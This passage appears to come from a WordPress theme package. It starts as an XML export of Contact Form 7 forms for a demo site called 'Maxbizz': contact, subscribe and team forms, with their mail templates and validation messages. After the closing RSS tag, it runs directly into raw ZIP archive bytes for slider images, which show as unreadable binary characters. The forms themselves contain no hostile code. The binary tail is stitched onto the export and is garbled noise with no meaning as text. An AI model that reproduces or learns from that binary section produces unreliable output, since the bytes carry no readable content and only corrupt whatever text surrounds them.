This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>610</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:52:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:52:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=736</link>
		<pubDate>Thu, 10 Sep 2020 08:20:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=736</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>736</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:20:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:20:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Subscribe Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=741</link>
		<pubDate>Thu, 10 Sep 2020 08:29:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=741</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>741</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:29:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:29:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Main Contact</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=wpcf7_contact_form&#038;p=1319</link>
		<pubDate>Thu, 03 Sep 2020 08:30:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1319</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:30:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:30:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
				</channel>
</rss>
	PK�8FZl�B�{p{p'inc/backend/data/consulting/sliders.zipnu�[���PK
5U�Qsliders/PK!U�Q4K��Mohpsliders/slider-2.zip
��PK�SQr�}��y� images/2020/10/slider1-home2.jpg��PA�-�,.
�(��%K�$���9�d� 9Â	���E2K^rRDTrN%HN~�s��}�z�֭��j�&t��>�sNw�̿�����
p����J��� �$,KVM=���x,�����ga��Ț��ʼn���1�->~ %����c�~dmk�,����mo%ͬ'�"��������������R܊Y�Z�G��鱓�������]�G��?�K��V�3����#�|�lZ_E}���-�'�kyKX-&�wKT@\P�-(pK�_@�����-	Q	!q�L̄��Y�Hh��ϾK��sR���|�B|.n�������y	)x�}�=,|x��Y�[�������c{g�ٲ�#Oif���c��]��j99�7������=����ck~MkwO7KkBr��׮��Y��FB�͞pS,e],=���=�J3��Y�[Iܺ-p떘�������[�n�޻w[^�֭�����w���S����E�������-�{��D䄄DED	��o���Ζ��k�����數�fm��������n����n��-x���S����������C�v�����wsqB��K��@L�摐�����G�V�V��bbV�b�DŬ-�E,m���'����W%�!���"ae)n!��R��B��m^�G�"�����ڈ	>��g�'"����w�b��oD�7���	@r# ��:����	Ȅ������D#I��IHI��(�yr2��dd��(�/\��x���%�K��_�v�:���s��Q�S\���BOKEK����P��(�a� *������_@���;A"$1�9�?��l�D� "���9���Bݸ��K�aA��|���R�{�z4Yh��������*���̝m�R�7�OV��P8�0A��Cg%� �E}�a��|I�8��T�ս��z��7
ȉ9����خS+<`�̑��p,A	�>�4�jdD�RِG 2D�{">�n*���f``����ֆB���dph8�G�g��mlD�FY�>a	��<i���H2�@�!b	���2L�}�5 �
�T�w3�ay,���9vt �&-X��k$��
�΂��2V�����5~��:��C	��� �)��2$F����_�`�"s��^�0P��璚3�\�@ a�g��,�����	�Hw����8ث�|g��D��
\⵰O�*h�<} 0��d�_�-rA�i(a{��!���4�:_gV)��4�ڈo�fK��� ��na�L�	9G��
/ή����h��=C�"c�#X�B�� w�n��:�_�,ϸ�'�l�E�S�!�+d,7�f7W/��+�E�!S�x(E�љX���?��=��U�k[��j�е�Q�~T7�͏Ou̞�u*�
}!-l�$�b�`�#Q.�2� �y�x�"�(L�D�3��p��#ZЯ��~@Ҡ�v���]M���#)�p �XJZ`)@(�!�i, T"��9QL	�|F��ҮP���<��+�߀`V�Ay��GeP�I3�#CD��Q�&�2��#1D	#D����I�Xz}���uޥAfd*�*P�4(b�j�0�
�!O�\E�Y(.SY¹s�O���A��
]���	�aY{�n�JT!L�F�}L����K�����d�U�����>����6�[���')�jn��>Z�����_�̓ȇ�^zw��1/�֊�`zu���z͚{hڬ�'����TYr��	�r�+4thϿ���Nt5��|��?P�c�/�`�d������ؙ��?�Cq �?���Y�<����M�hsG�^��ka�1I�(@�Rl��|c�'�iy;���;����Dc*z|u$r�ͽs�}�ඛkYÖ��}C���uj�|J߾�u�<~����>������ I���x�\�f�aE{$��J'.Cz�`�ĘM	�v�b��ݪ��ӯ.<��0I%'�=$KN�K	�A
Y���F�����\����p�����i>%VDe(v����Ћ��ͯri=�|�kV+i��1�G��hg�XE�V���`(�K�o2 .6b��8j&TZ���ܽ]�k�#l,��15�&(��0�-��G�C� Vֳ�����2�"D(��L�B#��ۓ��0�)�Bwߤ�b)�g�B�!��@j��.�g��&��F!@�
(HMe�
F"��0�&��B�!��$� �)�d!�ES;$D����{7) �#ͥ�V�Bq�ߥ$�mT?��$��#>"�`�������?>�w�M`���2@A�͈�8��˨DG룰���o�)e!�<�~�2���E(^�Ǿ�r�x���}7��{M�'�'��R�L�0-y!�e0m�y7t�W<j�4�1�l��2tr�G�Hﺆ��䀿��w��PQ�
�KmC�c8�E���~s ե�p"���?�o��u������i�rSx'�#��&�^UM&��V��L��f�ӣn�G�,��o�U��_ܶ.[��0���~�$��xA��޻7A&}���W��Ę�.U(qw:�Z�Wr�̻Td�_.8t*�kko�Y��4�)��>19�I,��y@�u�|�ڶ�پ�X|sn�l��hʚ�B���o��W�߂oon;����F�Gc|lc.���+�7�
�c�VL�"�����i�}u�k��?`�3���fL�'1j�3[>h���R�8A��s1{.���t�1�I<�Wl1e���Q%�3ٶ|�z�g��w0���v�Ma���.�;�����Jd�5�j/.������,�{R2;$���\R��e(W]A��(�ʥ6$�)�|
+�x��(T?���3���&23'�B���Eb�������
[��u2�i��/)�G�?v����\D�,#.�#�5�)�����C(h`j��� +A�J�c��!f}�P��")@��Xj�D, sfJBzYLIPePŠ>!��{�DP��R�y�Dc	�B
��`������@S��w-5��7(� F?�)s���(�
.�+��#�^�Duӆ�(
ApQB�FS���qX�ZfT_܋X
X>���l�W�WiP�>4�˴€��+�$k�"H�e��eP9"̹���	'�w�	�+|�Ӿ�����z��>#/ҹ�`�\$o4�����)�b���l�����r:j���_�����<����
�I�>�R�Y�cTn�;e�=��.��Ob�����6(�Q��hА~)!36�Gg��{z�=�q�;=�S�� >[�e�G������M�q���K���\Lx�+^�A�oe"\m�}i�t��_��Zɧ�dR�v˹�A�Mc╎ר�N�{�3��Ku�zns�j|}��5��.w+�-���mm\�g���Zf�r-p��/����]�a!?q�TČ����fC��hBk;F��(�U�����a`�g��9:��Ɖ冧��i
����<+��k�~�t1��?X��|
���'Ӥ�hy�_-���al����#��~�48�a����'��(3P���t���$O���#M\ƒd�Ƽ�֡��aRTGY��Rrgmu��צvϦ�̞���#=��;��/
�V��'c�+j�/8y
�~d��MY��!B��'�G�aR�"*~	��%GN�4@�9)�ѵBCU��ˀ�Ly����{�~����q�&����~ސ��'���c�F�I�%�Al(?���i�h&y����>��]�t�KU��
�~��_�ʥ0-:�.g%�3�(��TlhD&GĢ�(R�EjG�`�C��4�3Wi��Hu�Ύ��T��X��!`}2VJ2@��҄!(�@W����5�nJ��@� ����P�/o(-�œ� �`
